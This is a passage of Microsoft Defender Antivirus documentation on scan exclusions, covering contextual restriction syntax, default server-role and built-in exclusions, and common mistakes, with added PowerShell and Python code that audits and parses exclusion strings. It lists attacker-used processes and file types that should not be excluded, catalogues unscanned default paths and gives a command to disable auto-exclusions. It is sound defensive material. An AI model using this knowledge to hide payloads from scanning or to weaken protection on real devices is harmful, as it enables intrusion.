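# lists against the rules stated in the two exclusion articles. Requires an elevated prompt and
# the Defender module on a real device; the constructed $sample at the bottom runs anywhere.

function Get-DefenderExclusionFindings {
    [CmdletBinding()]
    param(
        # Output of Get-MpPreference, or any object with ExclusionPath, ExclusionExtension and ExclusionProcess.
        [Parameter(Mandatory)] $Preference
    )

    # Drive letters currently mapped to network shares; the article says to specify the actual network path.
    $mappedDrives = @(Get-PSDrive -PSProvider FileSystem -ErrorAction SilentlyContinue |
        Where-Object { $_.DisplayRoot -like '\\*' } |
        ForEach-Object { $_.Name.ToUpperInvariant() })

    # Per the system environment variable table, these resolve under the SYSTEM profile
    # (C:\Windows\System32\config\systemprofile), not under the signed-in user's profile.
    $systemProfileVars = '%USERPROFILE%', '%APPDATA%', '%LOCALAPPDATA%'

    # This example's own list of high-impact types: an extension exclusion applies everywhere on the device.
    $executableTypes = 'exe', 'dll', 'sys', 'com', 'scr', 'ps1', 'bat', 'cmd', 'vbs', 'js'

    $findings = [System.Collections.Generic.List[object]]::new()
    $add = {
        param($ListName, $Item, $Severity, $Reason)
        $findings.Add([pscustomobject]@{ List = $ListName; Item = $Item; Severity = $Severity; Reason = $Reason })
    }

    foreach ($path in @($Preference.ExclusionPath)) {
        if ([string]::IsNullOrWhiteSpace($path)) { continue }
        $wildcards = [regex]::Matches($path, '[*?]').Count
        if ($wildcards -gt 6) {
            & $add 'ExclusionPath' $path 'Error' "$wildcards wildcards; a maximum of six per entry is supported"
        }
        if ($path -match '^[*?]:') {
            & $add 'ExclusionPath' $path 'Error' 'A wildcard cannot stand in place of a drive letter'
        }
        if ($path -match '^([A-Za-z]):' -and $mappedDrives -contains $Matches[1].ToUpperInvariant()) {
            & $add 'ExclusionPath' $path 'Error' 'Mapped network drive; specify the actual network path instead'
        }
        if ($path -match '^[A-Za-z]:\\?$') {
            & $add 'ExclusionPath' $path 'Error' 'Excludes an entire drive'
        }
        foreach ($v in $systemProfileVars) {
            if ($path -like "*$v*") {
                & $add 'ExclusionPath' $path 'Info' "$v is evaluated as NT AUTHORITY\SYSTEM and resolves under the systemprofile folder"
            }
        }
    }

    foreach ($ext in @($Preference.ExclusionExtension)) {
        if ([string]::IsNullOrWhiteSpace($ext)) { continue }
        $normalized = $ext.TrimStart('.').ToLowerInvariant()   # the article accepts both ".test" and "test"
        if ($executableTypes -contains $normalized) {
            & $add 'ExclusionExtension' $ext 'Warning' 'Excludes every file with this executable extension, anywhere on the device'
        }
    }

    foreach ($proc in @($Preference.ExclusionProcess)) {
        if ([string]::IsNullOrWhiteSpace($proc)) { continue }
        if ($proc.Contains('?')) {
            & $add 'ExclusionProcess' $proc 'Error' 'The ? wildcard is not supported in the process exclusion list'
        }
        $star = $proc.IndexOf('*')
        if ($star -ge 0 -and $star -ne $proc.Length - 1) {
            & $add 'ExclusionProcess' $proc 'Error' 'The * wildcard is only supported at the end of a complete path'
        }
        if ($proc -notmatch '[\\%]') {
            & $add 'ExclusionProcess' $proc 'Warning' 'Bare image name: files opened by any process with this name, in any folder, skip real-time scanning'
        }
    }
    return $findings
}

# Constructed sample (not from a real device) so the checks can be seen without Get-MpPreference.
$sample = [pscustomobject]@{
    ExclusionPath      = 'C:\Serv\*\*\Backup', '*:\Temp', 'D:\', '%APPDATA%\Tool\Cache', 'C:\a\*\*\*\*\*\*\*\z'
    ExclusionExtension = '.test', 'exe'
    ExclusionProcess   = 'test.exe', 'c:\test\sample\*', 'c:\tools\?.exe', 'c:\*\tool.exe'
}
Get-DefenderExclusionFindings -Preference $sample | Format-Table -AutoSize

# On a device, audit the live lists instead (elevated prompt, Defender module):
# Get-DefenderExclusionFindings -Preference (Get-MpPreference) | Format-Table -AutoSize
```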

 Tip

If you're looking for Antivirus related information for other platforms, see:

Set preferences for Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Set preferences for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features

Related articles
Configure and validate exclusions in Microsoft Defender Antivirus scans
Configure and validate exclusions based on file name, extension, and folder
location
Configure Microsoft Defender Antivirus exclusions on Windows Server
Common mistakes to avoid when defining exclusions
Customize, initiate, and review the results of Microsoft Defender Antivirus scans
and remediation
Microsoft Defender Antivirus in Windows 10


Contextual file and folder exclusions
Article • 02/27/2024

Applies to:

Microsoft Defender for Endpoint Plan 1

Microsoft Defender for Endpoint Plan 2

Microsoft Defender for Business

Microsoft Defender Antivirus

Microsoft Defender for individuals

This article describes the contextual file and folder exclusions capability for Microsoft Defender Antivirus on Windows. This capability allows you to be more specific when you define under which context Microsoft Defender Antivirus shouldn't scan a file or folder, by applying restrictions.

Overview
Exclusions are primarily intended to mitigate effects on performance. They come at the penalty of reduced protection value. These restrictions allow you to limit this protection reduction by specifying circumstances under which the exclusion should apply.
Contextual exclusions aren't suitable for addressing false positives in a reliable way. If
you encounter a false positive, you can submit files for analysis through the Microsoft
Defender XDR portal (subscription required) or through the Microsoft Security
Intelligence website. For a temporary suppression method, consider creating a custom
allow indicator in Microsoft Defender for Endpoint.

There are four restrictions you can apply to limit the applicability of an exclusion:

File/folder path type restriction. You can restrict exclusions to only apply if the target is a file, or a folder, by making the intent specific. If the target is a file but the exclusion is specified to be a folder, it will not apply. Conversely, if the target is a folder but the exclusion is specified to be a file, the exclusion will apply.
Scan type restriction. Enables you to define the required scan type for an exclusion
to apply. For example, you only want to exclude a certain folder from Full scans but
not from a "resource" scan (targeted scan).
Scan trigger type restriction. You can use this restriction to specify that the
exclusion should only apply when the scan was initiated by a specific event:
on demand
on access
or originating from behavioral monitoring
Process restriction. Enables you to define that an exclusion should only apply
when a file or folder is being accessed by a specific process.

Configuring restrictions
Restrictions are typically applied by adding the restriction type to the file or folder
exclusion path.

Restriction     Type name     Value
File/folder     PathType      file
                              folder
Scan type       ScanType      quick
                              full
Scan trigger    ScanTrigger   OnDemand
                              OnAccess
                              BM
Process         Process       "<image_path>"

Requirements
This capability requires Microsoft Defender Antivirus:

Platform: 4.18.2205.7 or later
Engine: 1.1.19300.2 or later

Syntax
As a starting point, you may already have exclusions in place that you wish to make
more specific. To form the exclusion string, first define the path to the file or folder to be
excluded, then add the type name and associated value, as shown in the following
example.

<PATH>\:{TypeName:value,TypeName:value}

Keep in mind that all types and values are case sensitive.

Note

All conditions inside {} MUST be true for the restriction to match. For example, if you
specify two scan triggers, both cannot be true at the same time, so the exclusion will not
apply. To specify two restrictions of the same type, create two separate exclusions.

Examples
The following string excludes "c:\documents\design.doc" only if it's a file and only in on-
access scans:

c:\documents\design.doc\:{PathType:file,ScanTrigger:OnAccess}

The following string excludes "c:\documents\design.doc" only if it's scanned (on-access)
due to it being accessed by a process having the image name "winword.exe":

c:\documents\design.doc\:{Process:"winword.exe"}

File and folder paths may contain wildcards, as in the following example:

c:\*\*.doc\:{PathType:file,ScanTrigger:OnDemand}

The process image path may contain wildcards, as in the following example:

c:\documents\design.doc\:{Process:"C:\Program Files*\Microsoft Office\root\Office??\winword.exe"}

File/folder restriction
You can restrict exclusions to only apply if the target is a file or a folder by making the
intent specific. If the target is a file but the exclusion is specified to be a folder, the
exclusion won't apply. Conversely, if the target is a folder but the exclusion is specified to
be a file, the exclusion will apply.

File/folder exclusions default behavior

If you don't specify any other options, the file/folder is excluded from all types of scans,
and the exclusion applies regardless of whether the target is a file or a folder. For more
information about customizing exclusions to only apply to a specific scan type, see Scan
type restriction.

Note

Wildcards are supported in file/folder exclusions.

Folders

To ensure an exclusion only applies if the target is a folder, not a file, you can use the
PathType:folder restriction. For example:

C:\documents\*\:{PathType:folder}

Files

To make sure an exclusion only applies if the target is a file, not a folder, you can use the
PathType:file restriction.

Example:

C:\documents\*.mdb\:{PathType:file}

Scan type restriction

By default, exclusions apply to all scan types:

resource: a single file or folder is scanned in a targeted way (for example, right-click, Scan)
quick: common startup locations utilized by malware, memory, and certain registry keys
full: includes quick scan locations and the complete file system (all files and folders)

To mitigate performance issues, you can exclude a folder or a set of files from being
scanned by a specific scan type. You can also define the required scan type for an
exclusion to apply.

To exclude a folder from being scanned only during a full scan, specify a restriction type
together with the file or folder exclusion, as in the following example:

C:\documents\:{ScanType:full}

To exclude a folder from being scanned only during a quick scan, specify a restriction
type together with the file or folder exclusion:

C:\program.exe\:{ScanType:quick}

If you want to make sure this exclusion only applies to a specific file and not a folder
(C:\program.exe could be a folder), also apply the PathType restriction:

C:\program.exe\:{ScanType:quick,PathType:file}

Scan trigger restriction

By default, basic exclusions apply to all scan triggers. The ScanTrigger restriction enables
you to specify that the exclusion should only apply when the scan was initiated by a
specific event: on demand (including quick, full, and targeted scans), on access, or
originating from behavioral monitoring (including memory scans).

OnDemand: a scan was triggered by a command or admin action. Remember that
scheduled quick and full scans also fall under this category.
OnAccess: a file or folder is opened/written/read/modified (typically considered
real-time protection).
BM: a behavioral trigger causes behavioral monitoring to scan a specific file.

To exclude a file or folder and its contents from being scanned only when the scan is
triggered by the file being accessed, define a scan trigger restriction such as the
following example:

c:\documents\:{ScanTrigger:OnAccess}

Process restriction
This restriction allows you to define that an exclusion should only apply when a file or
folder is being accessed by a specific process. A common scenario is when you want to
avoid excluding the process itself, because a process exclusion would cause Defender
Antivirus to ignore all other operations by that process. Wildcards are supported in the
process name/path.

Note

Using a large number of process exclusion restrictions on a machine can adversely
affect performance. In addition, if an exclusion is restricted to a certain process or
processes, other active processes (such as indexing, backup, updates) can still
trigger file scans.

To exclude a file or folder only when accessed by a specific process, create a normal file
or folder exclusion and add the process to restrict the exclusion to. For example:

c:\documents\design.doc\:{Process:"winword.exe", Process:"msaccess.exe", Process:"C:\Program Files*\Microsoft Office\root\Office??\winword.exe"}
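The syntax section and the examples above describe the string format and when each restriction matches. The following Python parser and evaluator is an added example, not Microsoft's code: it validates an exclusion string against the type names and values in the table and decides whether the exclusion applies to a given scan. It assumes fnmatch-style wildcard matching, treats several Process entries in one exclusion as alternatives (as the article's last example implies), and uses constructed paths and process names.

```python
r"""Parse and evaluate Microsoft Defender Antivirus contextual exclusion strings
of the form <PATH>\:{TypeName:value,TypeName:value}. Added illustration only:
matching follows the article's wording rather than Microsoft's implementation,
wildcards are approximated with fnmatch, and every sample path and process
name is constructed for this example."""
import fnmatch
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Type names and their permitted values; everything is case sensitive.
ALLOWED = {
    "PathType": {"file", "folder"},
    "ScanType": {"quick", "full"},
    "ScanTrigger": {"OnDemand", "OnAccess", "BM"},
    "Process": None,  # a double-quoted image name or path, wildcards permitted
}
SEPARATOR = "\\:{"  # the literal \:{ that introduces the restriction list

@dataclass
class Exclusion:
    path: str
    restrictions: List[Tuple[str, str]] = field(default_factory=list)

@dataclass
class ScanContext:
    target: str                    # path being scanned
    is_folder: bool
    scan_type: str                 # "resource", "quick" or "full"
    trigger: str                   # "OnDemand", "OnAccess" or "BM"
    process: Optional[str] = None  # image path of the accessing process, if any

def parse(exclusion: str) -> Exclusion:
    """Split an exclusion string into its path and (type, value) restrictions;
    raise ValueError for anything the syntax section does not allow."""
    if SEPARATOR not in exclusion:
        return Exclusion(exclusion)  # plain exclusion without restrictions
    path, _, rest = exclusion.partition(SEPARATOR)
    if not rest.endswith("}"):
        raise ValueError("restriction list must end with '}'")
    excl = Exclusion(path)
    # Split on commas outside double quotes (a quoted image path may hold spaces).
    for item in re.split(r',(?=(?:[^"]*"[^"]*")*[^"]*$)', rest[:-1]):
        type_name, sep, value = item.strip().partition(":")
        if not sep or type_name not in ALLOWED:
            raise ValueError(f"unknown restriction type {type_name!r}")
        if type_name == "Process":  # several Process entries are accepted
            if len(value) < 2 or value[0] != '"' or value[-1] != '"':
                raise ValueError("Process image path must be double-quoted")
            value = value[1:-1]
        elif value not in ALLOWED[type_name]:
            raise ValueError(f"invalid value {value!r} for {type_name}")
        elif any(t == type_name for t, _ in excl.restrictions):
            # Two conditions of one type can never both be true: use two exclusions.
            raise ValueError(f"{type_name} given twice")
        excl.restrictions.append((type_name, value))
    return excl

def is_valid(exclusion: str) -> bool:
    try:
        parse(exclusion)
        return True
    except ValueError:
        return False

def _path_matches(pattern: str, target: str) -> bool:
    # Try the target and each ancestor folder, so a folder exclusion covers its contents.
    pat = pattern.lower().rstrip("\\")
    parts = target.lower().rstrip("\\").split("\\")
    return any(fnmatch.fnmatchcase("\\".join(parts[:i]), pat)
               for i in range(len(parts), 0, -1))

def _process_matches(pattern: str, image_path: str) -> bool:
    # A bare image name is compared with the file name only, a path with the whole path.
    pat, image = pattern.lower(), image_path.lower()
    if "\\" not in pat:
        image = image.rsplit("\\", 1)[-1]
    return fnmatch.fnmatchcase(image, pat)

def applies(excl: Exclusion, ctx: ScanContext) -> bool:
    """Decide whether the exclusion suppresses the scan described by ctx."""
    if not _path_matches(excl.path, ctx.target):
        return False
    expected = {"ScanType": ctx.scan_type, "ScanTrigger": ctx.trigger}
    processes = [v for t, v in excl.restrictions if t == "Process"]
    for type_name, value in excl.restrictions:
        # PathType:folder never applies to a file target; PathType:file applies to both.
        if type_name == "PathType" and value == "folder" and not ctx.is_folder:
            return False
        if type_name in expected and expected[type_name] != value:
            return False
    if processes and not (ctx.process and any(
            _process_matches(p, ctx.process) for p in processes)):
        return False
    return True
```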

How to configure
After constructing your desired contextual exclusions, you can use your existing
management tool to configure file and folder exclusions using the string you created.

See: Configure and validate exclusions for Microsoft Defender Antivirus scans

Microsoft Defender Antivirus exclusions
on Windows Server
Article • 08/07/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

This article describes types of exclusions that you don't have to define for Microsoft
Defender Antivirus:

Built-in exclusions for operating system files on all versions of Windows.
Automatic exclusions for roles on Windows Server 2016 and later.

For a more detailed overview of exclusions, see Manage exclusions for Microsoft
Defender for Endpoint and Microsoft Defender Antivirus.

A few important points about exclusions on Windows Server

Custom exclusions take precedence over automatic exclusions.

Automatic exclusions only apply to real-time protection (RTP) scanning.

Automatic exclusions aren't honored during a quick scan, full scan, and custom
scan.

Custom and duplicate exclusions don't conflict with automatic exclusions.

Microsoft Defender Antivirus uses the Deployment Image Servicing and
Management (DISM) tools to determine which roles are installed on your
computer.

Appropriate exclusions must be set for software that isn't included with the
operating system.

Windows Server 2012 R2 doesn't have Microsoft Defender Antivirus as an
installable feature. When you onboard those servers to Defender for Endpoint,
you'll install Microsoft Defender Antivirus, and default exclusions for operating
system files are applied. However, exclusions for server roles (as specified below)
don't apply automatically, and you should configure these exclusions as
appropriate. To learn more, see Onboard Windows servers to the Microsoft
Defender for Endpoint service.

Built-in exclusions and automatic server role exclusions don't appear in the
standard exclusion lists that are shown in the Windows Security app.

The list of built-in exclusions in Windows is kept up to date as the threat landscape
changes. This article lists some, but not all, of the built-in and automatic exclusions.

Automatic server role exclusions

On Windows Server 2016 or later, you shouldn't need to define exclusions for server
roles. When you install a role on Windows Server 2016 or later, Microsoft Defender
Antivirus includes automatic exclusions for the server role and any files that are added
while installing the role.

Windows Server 2012 R2 does not support the automatic exclusions feature. You'll need
to define explicit exclusions for any server role and any software that's added after
installing the operating system.

Important

Default locations could be different than the locations that are described in
this article.

To set exclusions for software that isn't included as a Windows feature or
server role, refer to the software manufacturer's documentation.

Automatic exclusions include:

Hyper-V exclusions
SYSVOL files
Active Directory exclusions
DHCP Server exclusions
DNS Server exclusions
File and Storage Services exclusions
Print Server exclusions
Web Server exclusions
Windows Server Update Services exclusions

Hyper-V exclusions
The following table lists the file type exclusions, folder exclusions, and process
exclusions that are delivered automatically when you install the Hyper-V role.

Exclusion type   Specifics
File types       *.vhd
                 *.vhdx
                 *.avhd
                 *.avhdx
                 *.vsv
                 *.iso
                 *.rct
                 *.vmcx
                 *.vmrs
Folders          %ProgramData%\Microsoft\Windows\Hyper-V
                 %ProgramFiles%\Hyper-V
                 %SystemDrive%\ProgramData\Microsoft\Windows\Hyper-V\Snapshots
                 %Public%\Documents\Hyper-V\Virtual Hard Disks
Processes        %systemroot%\System32\Vmms.exe
                 %systemroot%\System32\Vmwp.exe

SYSVOL files

%systemroot%\Sysvol\Domain\*.adm
%systemroot%\Sysvol\Domain\*.admx
%systemroot%\Sysvol\Domain\*.adml
%systemroot%\Sysvol\Domain\Registry.pol
%systemroot%\Sysvol\Domain\*.aas
%systemroot%\Sysvol\Domain\*.inf
%systemroot%\Sysvol\Domain\*Scripts.ini
%systemroot%\Sysvol\Domain\*.ins
%systemroot%\Sysvol\Domain\Oscfilter.ini

Active Directory exclusions

This section lists the exclusions that are delivered automatically when you install Active
Directory Domain Services (AD DS).

NTDS database files

The database files are specified in the registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\DSA Database File

%windir%\Ntds\ntds.dit
%windir%\Ntds\ntds.pat

The AD DS transaction log files

The transaction log files are specified in the registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\Database Log Files Path

%windir%\Ntds\EDB*.log
%windir%\Ntds\Res*.log
%windir%\Ntds\Edb*.jrs
%windir%\Ntds\Ntds*.pat
%windir%\Ntds\TEMP.edb

The NTDS working folder

This folder is specified in the registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\DSA Working Directory

%windir%\Ntds\Temp.edb
%windir%\Ntds\Edb.chk

Process exclusions for AD DS and AD DS-related support files

%systemroot%\System32\ntfrs.exe
%systemroot%\System32\lsass.exe

DHCP Server exclusions

This section lists the exclusions that are delivered automatically when you install the
DHCP Server role. The DHCP Server file locations are specified by the DatabasePath,
DhcpLogFilePath, and BackupDatabasePath parameters in the registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DHCPServer\Parameters

%systemroot%\System32\DHCP\*\*.mdb
%systemroot%\System32\DHCP\*\*.pat
%systemroot%\System32\DHCP\*\*.log
%systemroot%\System32\DHCP\*\*.chk
%systemroot%\System32\DHCP\*\*.edb

DNS Server exclusions

This section lists the file and folder exclusions and the process exclusions that are
delivered automatically when you install the DNS Server role.

File and folder exclusions for the DNS Server role

%systemroot%\System32\Dns\*\*.log
%systemroot%\System32\Dns\*\*.dns
%systemroot%\System32\Dns\*\*.scc
%systemroot%\System32\Dns\*\BOOT

Process exclusions for the DNS Server role

%systemroot%\System32\dns.exe

File and Storage Services exclusions

This section lists the file and folder exclusions that are delivered automatically when you
install the File and Storage Services role. The exclusions listed below don't include
exclusions for the Clustering role.

%SystemDrive%\ClusterStorage
%clusterserviceaccount%\Local Settings\Temp
%SystemDrive%\mscs

Print Server exclusions

This section lists the file type exclusions, folder exclusions, and the process exclusions
that are delivered automatically when you install the Print Server role.

File type exclusions

*.shd
*.spl

Folder exclusions

This folder is specified in the registry key
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Printers\DefaultSpoolDirectory

%system32%\spool\printers\*

Process exclusions for the Print Server role

spoolsv.exe

Web Server exclusions

This section lists the folder exclusions and the process exclusions that are delivered
automatically when you install the Web Server role.

Folder exclusions

%SystemRoot%\IIS Temporary Compressed Files
%SystemDrive%\inetpub\temp\IIS Temporary Compressed Files
%SystemDrive%\inetpub\temp\ASP Compiled Templates
%systemDrive%\inetpub\logs
%systemDrive%\inetpub\wwwroot

Process exclusions for the Web Server role

%SystemRoot%\system32\inetsrv\w3wp.exe
%SystemRoot%\SysWOW64\inetsrv\w3wp.exe
%SystemDrive%\PHP5433\php-cgi.exe

Turning off scanning of files in the Sysvol\Sysvol folder or the SYSVOL_DFSR\Sysvol folder

The current location of the Sysvol\Sysvol or SYSVOL_DFSR\Sysvol folder and all the
subfolders is the file system reparse target of the replica set root. The Sysvol\Sysvol
and SYSVOL_DFSR\Sysvol folders use the following locations by default:

%systemroot%\Sysvol\Domain
%systemroot%\Sysvol_DFSR\Domain

The path to the currently active SYSVOL is referenced by the NETLOGON share and can
be determined by the SysVol value name in the following subkey:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Netlogon\Parameters

Exclude the following files from this folder and all its subfolders:

*.adm
*.admx
*.adml
Registry.pol
Registry.tmp
*.aas
*.inf
Scripts.ini
*.ins
Oscfilter.ini

Windows Server Update Services exclusions

This section lists the folder exclusions that are delivered automatically when you install
the Windows Server Update Services (WSUS) role. The WSUS folder is specified in the
registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Update Services\Server\Setup

%systemroot%\WSUS\WSUSContent
%systemroot%\WSUS\UpdateServicesDBFiles
%systemroot%\SoftwareDistribution\Datastore
%systemroot%\SoftwareDistribution\Download

Built-in exclusions
Because Microsoft Defender Antivirus is built into Windows, it doesn't require exclusions
for operating system files on any version of Windows.

Built-in exclusions include:

Windows "temp.edb" files
Windows Update files or Automatic Update files
Windows Security files
Group Policy files
WINS files
File Replication Service (FRS) exclusions
Process exclusions for built-in operating system files

The list of built-in exclusions in Windows is kept up to date as the threat landscape
changes.

Windows "temp.edb" files

%windir%\SoftwareDistribution\Datastore\*\tmp.edb
%ProgramData%\Microsoft\Search\Data\Applications\Windows\windows.edb

Windows Update files or Automatic Update files

%windir%\SoftwareDistribution\Datastore\*\Datastore.edb
%windir%\SoftwareDistribution\Datastore\*\edb.chk
%windir%\SoftwareDistribution\Datastore\*\edb\*.log
%windir%\SoftwareDistribution\Datastore\*\Edb\*.jrs
%windir%\SoftwareDistribution\Datastore\*\Res\*.log

Windows Security files

%windir%\Security\database\*.chk
%windir%\Security\database\*.edb
%windir%\Security\database\*.jrs
%windir%\Security\database\*.log
%windir%\Security\database\*.sdb

Group Policy files

%allusersprofile%\NTUser.pol
%SystemRoot%\System32\GroupPolicy\Machine\registry.pol
%SystemRoot%\System32\GroupPolicy\User\registry.pol

WINS files

%systemroot%\System32\Wins\*\*.chk
%systemroot%\System32\Wins\*\*.log
%systemroot%\System32\Wins\*\*.mdb
%systemroot%\System32\LogFiles\
%systemroot%\SysWow64\LogFiles\

File Replication Service (FRS) exclusions

Files in the File Replication Service (FRS) working folder. The FRS working folder is
specified in the registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NtFrs\Parameters\Working Directory

%windir%\Ntfrs\jet\sys\*\edb.chk
%windir%\Ntfrs\jet\*\Ntfrs.jdb
%windir%\Ntfrs\jet\log\*\*.log

FRS Database log files. The FRS Database log file folder is specified in the registry
key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Ntfrs\Parameters\DB Log File Directory

%windir%\Ntfrs\*\Edb\*.log

The FRS staging folder. The staging folder is specified in the registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NtFrs\Parameters\Replica Sets\GUID\Replica Set Stage

%systemroot%\Sysvol\*\Ntfrs_cmp*\

The FRS preinstall folder. This folder is specified by the folder
Replica_root\DO_NOT_REMOVE_NtFrs_PreInstall_Directory

%systemroot%\SYSVOL\domain\DO_NOT_REMOVE_NtFrs_PreInstall_Directory\*\Ntfrs*\

The Distributed File System Replication (DFSR) database and working folders.
These folders are specified by the registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\GUID\Replica Set Configuration File

Note

For custom locations, see Opting out of automatic exclusions.

%systemdrive%\System Volume Information\DFSR\$db_normal$
%systemdrive%\System Volume Information\DFSR\FileIDTable_*
%systemdrive%\System Volume Information\DFSR\SimilarityTable_*
%systemdrive%\System Volume Information\DFSR\*.XML
%systemdrive%\System Volume Information\DFSR\$db_dirty$
%systemdrive%\System Volume Information\DFSR\$db_clean$
%systemdrive%\System Volume Information\DFSR\$db_lostl$
%systemdrive%\System Volume Information\DFSR\Dfsr.db
%systemdrive%\System Volume Information\DFSR\*.frx
%systemdrive%\System Volume Information\DFSR\*.log
%systemdrive%\System Volume Information\DFSR\Fsr*.jrs
%systemdrive%\System Volume Information\DFSR\Tmp.edb

Process exclusions for built-in operating system files

%systemroot%\System32\dfsr.exe
%systemroot%\System32\dfsrs.exe

Opting out of automatic exclusions

In Windows Server 2016 and later, the predefined exclusions delivered by Security
intelligence updates only exclude the default paths for a role or feature. If you installed
a role or feature in a custom path, or you want to manually control the set of exclusions,
make sure to opt out of the automatic exclusions delivered in Security intelligence
updates. But keep in mind that the exclusions that are delivered automatically are
optimized for Windows Server 2016 and later. See Important points about exclusions
before defining your exclusion lists.

Warning

Opting out of automatic exclusions might adversely impact performance, or result
in data corruption. Automatic server role exclusions are optimized for Windows
Server 2016, Windows Server 2019, and Windows Server 2022.

Because predefined exclusions only exclude default paths, if you move NTDS and
SYSVOL folders to another drive or path that is different from the original path, you must
add exclusions manually. See Configure the list of exclusions based on folder name or
file extension.

You can disable the automatic exclusion lists with Group Policy, PowerShell cmdlets, and
WMI.

Use Group Policy to disable the auto-exclusions list on Windows Server 2016, Windows
Server 2019, and Windows Server 2022

1. On your Group Policy management computer, open the Group Policy Management
Console. Right-click the Group Policy Object you want to configure, and then select
Edit.

2. In the Group Policy Management Editor go to Computer configuration, and then
select Administrative templates.

3. Expand the tree to Windows components > Microsoft Defender Antivirus >
Exclusions.

4. Double-click Turn off Auto Exclusions, and set the option to Enabled. Then select
OK.

Use PowerShell cmdlets to disable the auto-exclusions list on Windows Server

Use the following cmdlets:

PowerShell

Set-MpPreference -DisableAutoExclusions $true

To learn more, see the following resources:

Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus.
Use PowerShell with Microsoft Defender Antivirus.

Use Windows Management Instrumentation (WMI) to disable the auto-exclusions list on
Windows Server

Use the Set method of the MSFT_MpPreference class for the following properties:

WMI

DisableAutoExclusions

For more information and allowed parameters, see:

Windows Defender WMIv2 APIs

Defining custom exclusions

If necessary, you can add or remove custom exclusions. To do that, see the following
articles:

Configure custom exclusions for Microsoft Defender Antivirus
Configure and validate exclusions based on file name, extension, and folder
location
Configure and validate exclusions for files opened by processes

See also
Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus
Common mistakes to avoid when defining exclusions
Customize, initiate, and review the results of Microsoft Defender Antivirus scans
and remediation
Microsoft Defender for Endpoint on Mac
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features


Common mistakes to avoid when
defining exclusions
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows
macOS
Linux

Important

Add exclusions with caution. Exclusions for Microsoft Defender Antivirus scans
reduce the level of protection for devices.

You can define an exclusion list for items that you don't want Microsoft Defender
Antivirus to scan. However, excluded items could contain threats that make your device
vulnerable. This article describes some common mistakes that you should avoid when
defining exclusions.

Tip

Before defining your exclusion lists, see Important points about exclusions and
review the detailed information in Exclusions for Microsoft Defender for Endpoint
and Microsoft Defender Antivirus.

Excluding certain trusted items

Certain files, file types, folders, or processes shouldn't be excluded from scanning even
though you trust that they're not malicious. Don't define exclusions for the folder
locations, file extensions, and processes that are listed in the following sections:

Folder locations
File extensions
Processes

Folder locations

Important

Certain folders shouldn't be excluded from scans because they can end up being
folders where malicious files can get dropped.

In general, don't define exclusions for any of the following folder locations:

%systemdrive%

C:, C:\, or C:\*

%ProgramFiles%\Java or C:\Program Files\Java

%ProgramFiles%\Contoso\, C:\Program Files\Contoso\, %ProgramFiles(x86)%\Contoso\, or
C:\Program Files (x86)\Contoso\

C:\Temp, C:\Temp\, or C:\Temp\*

C:\Users\ or C:\Users\*

C:\Users\<UserProfileName>\AppData\Local\Temp\ or
C:\Users\<UserProfileName>\AppData\LocalLow\Temp\. Note the following important
exceptions for SharePoint: Do exclude C:\Users\ServiceAccount\AppData\Local\Temp or
C:\Users\Default\AppData\Local\Temp when you use file-level antivirus protection
in SharePoint.

%Windir%\Prefetch, C:\Windows\Prefetch, C:\Windows\Prefetch\, or C:\Windows\Prefetch\*

%Windir%\System32\Spool or C:\Windows\System32\Spool

C:\Windows\System32\CatRoot2

%Windir%\Temp, C:\Windows\Temp, C:\Windows\Temp\, or C:\Windows\Temp\*

Linux and macOS Platforms

In general, don't define exclusions for the following folder locations:

/bin or /sbin
/usr/lib

File extensions

Important

Certain file extensions shouldn't be excluded because they can be file types that are
used in an attack.

In general, don't define exclusions for the following file extensions:

.7z
.bat
.bin
.cab
.cmd
.com
.cpl
.dll
.exe
.fla
.gif
.gz
.hta
.inf
.java
.jar
.job
.jpeg
.jpg
.js
.ko or .ko.gz
.msi
.ocx
.png
.ps1
.py
.rar
.reg
.scr
.sys
.tar
.tmp
.url
.vbe
.vbs
.wsf
.zip

Processes

Important

Certain processes shouldn't be excluded because they get used during attacks.

In general, don't define exclusions for the following processes:

AcroRd32.exe
addinprocess.exe
addinprocess32.exe
addinutil.exe
bash.exe
bginfo.exe
bitsadmin.exe
cdb.exe
csi.exe
cmd.exe
cscript.exe
dbghost.exe
dbgsvc.exe
dnx.exe
dotnet.exe
excel.exe
fsi.exe
fsiAnyCpu.exe
iexplore.exe
java.exe
kd.exe
lxssmanager.dll
msbuild.exe
mshta.exe
ntkd.exe
ntsd.exe
outlook.exe
psexec.exe
powerpnt.exe
powershell.exe
rcsi.exe
svchost.exe
schtasks.exe
system.management.automation.dll
windbg.exe
winword.exe
wmic.exe
wscript.exe
wuauclt.exe

Note

You can choose to exclude file types, such as .gif, .jpg, .jpeg, or .png, if your
environment has modern, up-to-date software with a strict update policy to
handle any vulnerabilities.

Linux and macOS Platforms

In general, don't define exclusions for the following processes:

bash
java
python and python3
sh
zsh

Using just the file name in the exclusion list

Malware might have the same name as that of a file that you trust and want to exclude
from scanning. Therefore, to avoid excluding potential malware from scanning, use a
fully qualified path to the file that you want to exclude instead of using just the file
name. For example, if you want to exclude Filename.exe from scanning, use the
